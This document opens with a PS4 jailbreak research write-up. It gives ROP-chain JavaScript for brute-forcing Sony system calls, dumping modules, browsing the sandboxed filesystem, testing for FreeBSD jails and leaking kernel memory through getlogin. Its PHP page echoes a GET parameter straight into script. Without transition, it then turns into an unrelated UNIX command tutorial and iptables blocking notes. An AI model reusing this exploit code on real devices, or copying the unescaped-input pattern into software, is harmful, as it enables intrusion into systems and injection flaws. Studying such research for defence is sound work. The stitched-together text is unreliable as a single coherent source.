var Sony = 533; chain.syscall("Sony system call", Sony + <?php print($_GET["b"]); ?>, 0, 0, 0, 0, 0, 0); chain.write_rax_ToVariable(0); Once the system call has executed, we can check the return value, and if it isn't interesting, redirect the page to the next system call:
if(chain.getVariable(0) == 0x16) window.location.assign("index.php?b=" + (<?php print($_GET["b"]); ?> + 1).toString()); Running the page with ?b=0 appended to the end will start the brute force from the first Sony system call.
Although this method requires a lot of experimentation, by passing different values to some of the system calls found by brute forcing and analysing the new return values, there are a few system calls which you should be able to partially identify.
System call 538
As an example, I'll take a look at system call 538, without relying on any module dumps.
These are the return values depending on what is passed as the first argument:
0 - 0x16, "Invalid argument" 1 - 0xe, "Bad address" Pointer to 0s - 0x64 initially, but each time the page is refreshed this value increases by 1 Other potential arguments to try would be PID, thread ID, and file descriptor.
Although most system calls will return 0 on success, due to the nature of the return value increasing after each time it is called, it seems like it is allocating a resource number, such as a file descriptor.
The next thing to do would be to look at the data before and after performing the system call, to see if it has been written to.
Since there is no change in the data, we can assume that it is an input for now.
I then tried passing a long string as the first argument. You should always try this with every input you find because there is the possibility of discovering a buffer overflow.
writeString(chain.data, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"); chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0); The return value for this is 0x3f, ENAMETOOLONG. Unfortunately it seems that this system call correctly limits the name (32 bytes including NULL truncator), but it does tell us that it is expecting a string, rather than a struct.
We now have a few possibilities for what this system call is doing, the most obvious being something related to the filesystem (such as a custom mkdir or open), but this doesn't seem particularly likely seeing as a resource was allocated even before we wrote any data to the pointer.
To test whether the first parameter is a path, we can break it up with multiple / characters to see if this allows for a longer string:
writeString(chain.data, "aaaaaaaaaa/aaaaaaaaaa/aaaaaaaaaa"); chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0); Since this also returns 0x3f, we can assume that the first argument isn't a path; it is a name for something that gets allocated a sequential identifier.
After analysing some more system calls, I found that the following all shared this exact same behaviour:
533 538 557 574 580 From the information that we have so far, it is almost impossible to pinpoint exactly what these system calls do, but as you run more tests, further information will slowly be revealed.
To save you some time, system call 538 is allocating an event flag (and it doesn't just take a name).
Using general knowledge of how a kernel works, you can guess, and then verify, what the system calls are allocating (semaphores, mutexes, etc).
Dumping additional modules
We can dump additional modules by following these stages:
Load the module Get the module's base address Dump the module I've extracted and posted a list of all module names on psdevwiki.
To load a module we will need to use the sceSysmoduleLoadModule function from libSceSysmodule.sprx + 0x1850. The first parameter is the module ID to load, and the other 3 should just be passed 0.
The following JuSt-ROP method can be used to perform a function call:
this.call = function(name, module, address, arg1, arg2, arg3, arg4, arg5, arg6) { console.log("call " + name);
if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1); if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2); if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3); if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4); if(typeof(arg5) !== "undefined") this.add("pop r8", arg5); if(typeof(arg6) !== "undefined") this.add("pop r9", arg6); this.add(module_bases[module] + address); } So, to load libSceAvSetting.sprx (0xb):
chain.call("sceSysmoduleLoadModule", libSysmodule, 0x1850, 0xb, 0, 0, 0); Unforunately, a segmentation fault will be triggered when trying to load certain modules; this is because the sceSysmoduleLoadModule function doesn't load dependencies, so you will need to manually load them first.
Like most system calls, this should return 0 on success. To see the loaded module ID that was allocated, we can use one of Sony's custom system calls, number 592, to get a list of currently loaded modules:
var countAddress = chain.data; var modulesAddress = chain.data + 8;
// System call 592, getLoadedModules(int *destinationModuleHandles, int max, int *count); chain.syscall("getLoadedModules", 592, modulesAddress, 256, countAddress);
chain.execute(function() { var count = getU64from(countAddress); for(var index = 0; index < count; index++) { logAdd("Module handle: 0x" + getU32from(modulesAddress + index * 4).toString(16)); } }); Running this without loading any additional modules will produce the following list:
0x0, 0x1, 0x2, 0xc, 0xe, 0xf, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1e, 0x37, 0x59 But if we run it after loading module 0xb, we will see an additional entry, 0x65. Remember that module ID is not the same as loaded module handle.
We can now use another of Sony's custom system calls, number 593, which takes a module handle and a buffer, and fills the buffer with information about the loaded module, including its base address. Since the next available handle is always 0x65, we can hardcode this value into our chain, rather than having to store the result from the module list.
The buffer must start with the size of the struct that should be returned, otherwise error 0x16 will be returned, "Invalid argument":
setU64to(moduleInfoAddress, 0x160); chain.syscall("getModuleInfo", 593, 0x65, moduleInfoAddress);
chain.execute(function() { logAdd(hexDump(moduleInfoAddress, 0x160)); }); It will return 0 upon success, and fill the buffer with a struct which can be read like so:
var name = readString(moduleInfoAddress + 0x8); var codeBase = getU64from(moduleInfoAddress + 0x108); var codeSize = getU32from(moduleInfoAddress + 0x110); var dataBase = getU64from(moduleInfoAddress + 0x118); var dataSize = getU32from(moduleInfoAddress + 0x120); We now have everything we need to dump the module!
dump(codeBase, codeSize + dataSize); There is another Sony system call, number 608, which works in a similar way to 593, but provides slightly different information about the loaded module:
setU64to(moduleInfoAddress, 0x1a8); chain.syscall("getDifferentModuleInfo", 608, 0x65, 0, moduleInfoAddress); logAdd(hexDump(moduleInfoAddress, 0x1a8)); It's not clear what this information is.
Browsing the filesystem
The PS4 uses the standard FreeBSD 9.0 system calls for reading files and directories.
However, whilst using read for some directories such as /dev/ will work, others, such as / will fail.
I'm not sure why this is, but if we use getdents instead of read for directories, it will work much more reliably:
writeString(chain.data, "/dev/"); chain.syscall("open", 5, chain.data, 0, 0); chain.write_rax_ToVariable(0);
chain.read_rdi_FromVariable(0); chain.syscall("getdents", 272, undefined, chain.data + 0x10, 1028); This is the resultant memory:
0000010: 0700 0000 1000 0205 6469 7073 7700 0000 ........dipsw... 0000020: 0800 0000 1000 0204 6e75 6c6c 0000 0000 ........null.... 0000030: 0900 0000 1000 0204 7a65 726f 0000 0000 ........zero.... 0000040: 0301 0000 0c00 0402 6664 0000 0b00 0000 ........fd...... 0000050: 1000 0a05 7374 6469 6e00 0000 0d00 0000 ....stdin....... 0000060: 1000 0a06 7374 646f 7574 0000 0f00 0000 ....stdout...... 0000070: 1000 0a06 7374 6465 7272 0000 1000 0000 ....stderr...... 0000080: 1000 0205 646d 656d 3000 0000 1100 0000 ....dmem0....... 0000090: 1000 0205 646d 656d 3100 0000 1300 0000 ....dmem1....... 00000a0: 1000 0206 7261 6e64 6f6d 0000 1400 0000 ....random...... 00000b0: 1000 0a07 7572 616e 646f 6d00 1600 0000 ....urandom..... 00000c0: 1400 020b 6465 6369 5f73 7464 6f75 7400 ....deci_stdout. 00000d0: 1700 0000 1400 020b 6465 6369 5f73 7464 ........deci_std 00000e0: 6572 7200 1800 0000 1400 0209 6465 6369 err.........deci 00000f0: 5f74 7479 3200 0000 1900 0000 1400 0209 _tty2........... 0000100: 6465 6369 5f74 7479 3300 0000 1a00 0000 deci_tty3....... 0000110: 1400 0209 6465 6369 5f74 7479 3400 0000 ....deci_tty4... 0000120: 1b00 0000 1400 0209 6465 6369 5f74 7479 ........deci_tty 0000130: 3500 0000 1c00 0000 1400 0209 6465 6369 5...........deci 0000140: 5f74 7479 3600 0000 1d00 0000 1400 0209 _tty6........... 0000150: 6465 6369 5f74 7479 3700 0000 1e00 0000 deci_tty7....... 0000160: 1400 020a 6465 6369 5f74 7479 6130 0000 ....deci_ttya0.. 0000170: 1f00 0000 1400 020a 6465 6369 5f74 7479 ........deci_tty 0000180: 6230 0000 2000 0000 1400 020a 6465 6369 b0.. .......deci 0000190: 5f74 7479 6330 0000 2200 0000 1400 020a _ttyc0.."....... 00001a0: 6465 6369 5f73 7464 696e 0000 2300 0000 deci_stdin..#... 00001b0: 0c00 0203 6270 6600 2400 0000 1000 0a04 ....bpf.$....... 00001c0: 6270 6630 0000 0000 2900 0000 0c00 0203 bpf0....)....... 00001d0: 6869 6400 2c00 0000 1400 0208 7363 655f hid.,.......sce_ 00001e0: 7a6c 6962 0000 0000 2e00 0000 1000 0204 zlib............ 00001f0: 6374 7479 0000 0000 3400 0000 0c00 0202 ctty....4....... 0000200: 6763 0000 3900 0000 0c00 0203 6463 6500 gc..9.......dce. 0000210: 3a00 0000 1000 0205 6462 6767 6300 0000 :.......dbggc... 0000220: 3e00 0000 0c00 0203 616a 6d00 4100 0000 >.......ajm.A... 0000230: 0c00 0203 7576 6400 4200 0000 0c00 0203 ....uvd.B....... 0000240: 7663 6500 4500 0000 1800 020d 6e6f 7469 vce.E.......noti 0000250: 6669 6361 7469 6f6e 3000 0000 4600 0000 fication0...F... 0000260: 1800 020d 6e6f 7469 6669 6361 7469 6f6e ....notification 0000270: 3100 0000 5000 0000 1000 0206 7573 6263 1...P.......usbc 0000280: 746c 0000 5600 0000 1000 0206 6361 6d65 tl..V.......came 0000290: 7261 0000 8500 0000 0c00 0203 726e 6700 ra..........rng. 00002a0: 0701 0000 0c00 0403 7573 6200 c900 0000 ........usb..... 00002b0: 1000 0a07 7567 656e 302e 3400 0000 0000 ....ugen0.4..... 00002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ You can read some of these devices, for example: reading /dev/urandom will fill the memory with random data.
It is also possible to parse this memory to create a clean list of entries; look at browser.html in the repository for a complete file browser:
Unfortunately, due to sandboxing we don't have complete access to the file system. Trying to read files and directories that do exist but are restricted will give you error 2, ENOENT, "No such file or directory".
We do have access to a lot of interesting stuff though including encrypted save data, trophies, and account information. I will go over more of the filesystem in my next article.
Sandboxing
As well as file related system calls failing for certain paths, there are other reasons for a system call to fail.
Most commonly, a disallowed system call will just return error 1, EPERM, "Operation not permitted"; such as trying to use ptrace, but other system calls may fail for different reasons:
Compatibilty system calls are disabled. If you are trying to call mmap for example, you must use system call number 477, not 71 or 197; otherwise a segfault will be triggered.
Other system calls such as exit will also trigger a segmentation fault:
chain.syscall("exit", 1, 0); Trying to create an SCTP socket will return error 0x2b, EPROTONOSUPPORT, indicating that SCTP sockets have been disabled in the PS4 kernel:
//int socket(int domain, int type, int protocol); //socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); chain.syscall("socket", 97, 2, 1, 132); And although calling mmap with PROT_READ | PROT_WRITE | PROT_EXEC will return a valid pointer, the PROT_EXEC flag is ignored. Reading its protection will return 3 (RW), and any attempt to execute the memory will trigger a segfault:
chain.syscall("mmap", 477, 0, 4096, 1 | 2 | 4, 4096, -1, 0); chain.write_rax_ToVariable(0); chain.read_rdi_FromVariable(0); chain.add("pop rax", 0xfeeb); chain.add("mov [rdi], rax"); chain.add("mov rax, rdi"); chain.add("jmp rax"); The list of open source software used in the PS4 doesn't list any kind of sandboxing software like Capsicum, so the PS4 must use either pure FreeBSD jails, or some kind of custom, proprietary, sandboxing system (unlikely).
Jails
We can prove the existence of FreeBSD jails being actively used in the PS4's kernel through the auditon system call being impossible to execute within a jailed environment:
chain.syscall("auditon", 446, 0, 0, 0); The first thing the auditon system call does is check jailed here, and if so, return ENOSYS:
if (jailed(td->td_ucred)) return (ENOSYS); Otherwise the system call would most likely return EPERM from the mac_system_check_auditon here:
error = mac_system_check_auditon(td->td_ucred, uap->cmd); if (error) return (error); Or from the priv_check here:
error = priv_check(td, PRIV_AUDIT_CONTROL); if (error) return (error); The absolute furthest that the system call could reach would be immediately after the priv_check, here, before returning EINVAL due to the length argument being 0:
if ((uap->length <= 0) || (uap->length > sizeof(union auditon_udata))) return (EINVAL); Since mac_system_check_auditon and priv_check will never return ENOSYS, having the jailed check pass is the only way ENOSYS could be returned.
When executing the chain, ENOSYS is returned (0x48).
This tells us that whatever sandbox system the PS4 uses is at least based on jails because the jailed check passes.
FreeBSD 9.0 kernel exploits
It makes little sense trying to look for new vulnerabilities in the FreeBSD 9.0 kernel source code because since its release in 2012, several kernel exploits have already been found, which the PS4 could potentially be vulnerable to.
We can immediately dismiss some of these for obvious reasons:
FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation Exploit - this won't work since, as previously stated, we don't have access to the ptrace system call. FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit - won't work because the PS4 uses an AMD processor. FreeBSD Kernel - Multiple Vulnerabilities - maybe the first vulnerability will lead to something, but the other 2 rely on SCTP sockets, which the PS4 kernel has disabled (as previously stated). However, there are some smaller vulnerabilites, which could lead to something:
getlogin
One vulnerability which looks easy to try is using the getlogin system call to leak a small amount of kernel memory.
The getlogin system call is intended to copy the login name of the current session to userland memory, however, due to a bug, the whole buffer is always copied, and not just the size of the name string. This means that we can read some uninitialised data from the kernel, which might be of some use.
Note that the system call (49) is actually int getlogin_r(char *name, int len); and not char *getlogin(void);.
So, let's try copying some kernel memory into an unused part of userland memory:
chain.syscall("getlogin", 49, chain.data, 17); Unfortunately 17 bytes is the most data we can get, since:
Login names are limited to MAXLOGNAME (from <sys/param.h>) characters, currently 17 including null. - FreeBSD Man Pages
After executing the chain, the return value was 0, which means that the system call worked! An excellent start. Now let's take a look at the memory which we pointed to:
Before executing the chain:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 After executing the chain:
72 6f 6f 74 00 fe ff ff 08 62 61 82 ff ff ff ff 00 After decoding the first 4 bytes as ASCII:
root So the browser is executed as root! That was unexpected.
But more interestingly, the memory leaked looks like a pointer to something in the kernel, which is always the same each time the chain is run; this is evidence to support Yifanlu's claims that the PS4 has no Kernel ASLR!
Summary
From the information currently available, the PS4's kernel seems to be very similar to the stock FreeBSD 9.0 kernel.
Importantly, the differences that are present appear to be from standard kernel configuration changes (such as disabling SCTP sockets), rather than from modified code. Sony have also added several of their own custom system calls to the kernel, but apart from this, the rest of the kernel seems fairly untouched.
In this respect, I'm inclined to believe that the PS4 shares most of the same juicy vulnerabilities as FreeBSD 9.0's kernel!
Unfortunately, most kernel exploits cannot be triggered from the WebKit entry point that we currently have due to sandboxing constraints (likely to be just stock FreeBSD jails).
And with FreeBSD 10 being out, it's unlikely that anyone is stashing away any private exploits for FreeBSD 9, so unless a new one is suddenly released, we're stuck with what is currently available.
It may not be impossible to exploit the PS4 kernel by leveraging some of the existing kernel memory corruption vulnerabilities, but it certainly would't be easy.
The best approach from here seems to be reverse engineering all of the modules which can be dumped, in order to document as many of Sony's custom system calls as possible; I have a hunch that we will have more luck targeting these, than the standard FreeBSD system calls.
Recently Jaicrab has discovered two UART ports on the PS4 which shows us that there are hardware hackers interested in the PS4. Although the role of hardware hackers has traditionally been to dump the RAM of a system, like with the DSi, which we can already do thanks to the WebKit exploit, there's also the possibility of a hardware triggered kernel vulnerability being found, like geohot's original PS3 hypervisor hack. It remains most likely that a kernel exploit will be found on the PS4 through system call vulnerabilities though.
Linux Command Line
ls list files and directories
ls -a list all files and directories
mkdir make a directory
cd directory change to named directory
cd change to home-directory
cd ~ change to home-directory
cd .. change to parent directory
pwd display the path of the current directory
cp (copy)
cp file1 file2 is the command which makes a copy of file1 in the current working directory and calls it file2
What we are going to do now, is to take a file stored in an open access area of the file system, and use the cp command to copy it to your unixstuff directory.
First, cd to your unixstuff directory.
% cd ~/unixstuff
Then at the UNIX prompt, type,
% cp /vol/examples/tutorial/science.txt .
Note: Don't forget the dot . at the end. Remember, in UNIX, the dot means the current directory.
The above command means copy the file science.txt to the current directory, keeping the name the same.
(Note: The directory /vol/examples/tutorial/ is an area to which everyone in the school has read and copy access. If you are from outside the University, you can grab a copy of the file here. Use 'File/Save As..' from the menu bar to save it into your unixstuff directory.)
Exercise 2a
Create a backup of your science.txt file by copying it to a file called science.bak
2.2 Moving files
mv (move)
mv file1 file2 moves (or renames) file1 to file2
To move a file from one place to another, use the mv command. This has the effect of moving rather than copying the file, so you end up with only one file rather than two.
It can also be used to rename a file, by moving the file to the same directory, but giving it a different name.
We are now going to move the file science.bak to your backup directory.
First, change directories to your unixstuff directory (can you remember how?). Then, inside the unixstuff directory, type
% mv science.bak backups/.
Type ls and ls backups to see if it has worked.
2.3 Removing files and directories
rm (remove), rmdir (remove directory)
To delete (remove) a file, use the rm command. As an example, we are going to create a copy of the science.txt file then delete it.
Inside your unixstuff directory, type
% cp science.txt tempfile.txt % ls % rm tempfile.txt % ls
You can use the rmdir command to remove a directory (make sure it is empty first). Try to remove the backups directory. You will not be able to since UNIX will not let you remove a non-empty directory.
Exercise 2b
Create a directory called tempstuff using mkdir , then remove it using the rmdir command.
2.4 Displaying the contents of a file on the screen
clear (clear screen)
Before you start the next section, you may like to clear the terminal window of the previous commands so the output of the following commands can be clearly understood.
At the prompt, type
% clear
This will clear all text and leave you with the % prompt at the top of the window.
cat (concatenate)
The command cat can be used to display the contents of a file on the screen. Type:
% cat science.txt
As you can see, the file is longer than than the size of the window, so it scrolls past making it unreadable.
less
The command less writes the contents of a file onto the screen a page at a time. Type
% less science.txt
Press the [space-bar] if you want to see another page, and type [q] if you want to quit reading. As you can see, less is used in preference to cat for long files.
head
The head command writes the first ten lines of a file to the screen.
First clear the screen then type
% head science.txt
Then type
% head -5 science.txt
What difference did the -5 do to the head command?
tail
The tail command writes the last ten lines of a file to the screen.
Clear the screen and type
% tail science.txt
Q. How can you view the last 15 lines of the file?
2.5 Searching the contents of a file
Simple searching using less
Using less, you can search though a text file for a keyword (pattern). For example, to search through science.txt for the word 'science', type
% less science.txt
then, still in less, type a forward slash [/] followed by the word to search
/science
As you can see, less finds and highlights the keyword. Type [n] to search for the next occurrence of the word.
grep (don't ask why it is called grep)
grep is one of many standard UNIX utilities. It searches files for specified words or patterns. First clear the screen, then type
% grep science science.txt
As you can see, grep has printed out each line containg the word science.
Or has it ????
Try typing
% grep Science science.txt
The grep command is case sensitive; it distinguishes between Science and science.
To ignore upper/lower case distinctions, use the -i option, i.e. type
% grep -i science science.txt
To search for a phrase or pattern, you must enclose it in single quotes (the apostrophe symbol). For example to search for spinning top, type
% grep -i 'spinning top' science.txt
Some of the other options of grep are:
-v display those lines that do NOT match -n precede each matching line with the line number -c print only the total count of matched lines Try some of them and see the different results. Don't forget, you can use more than one option at a time. For example, the number of lines without the words science or Science is
% grep -ivc science science.txt
wc (word count)
A handy little utility is the wc command, short for word count. To do a word count on science.txt, type
% wc -w science.txt
To find out how many lines the file has, type
% wc -l science.txt
SSH
iptables -I INPUT -s 1.2.3.4 -j DROP
or you can use append
iptables -A INPUT -s 1.2.3.4 -j DROP
How Do I Block Subnet (xx.yy.zz.ww/ss)?
Use the following syntax to block 10.0.0.0/8 on eth1 public interface: iptables -i eth1 -A INPUT -s 10.0.0.0/8 -j DROP
How Do I View Blocked IP Address?
Simply use the following command: iptables -L -v
How Do I Save Blocked IP Address? service iptables save
How Do I Unblock An IP Address?
Use the following syntax (the -d options deletes the rule from table):
- iptables -D INPUT -s xx.xxx.xx.xx -j DROP
- iptables -D INPUT -s 65.55.44.100 -j DROP
- service iptables save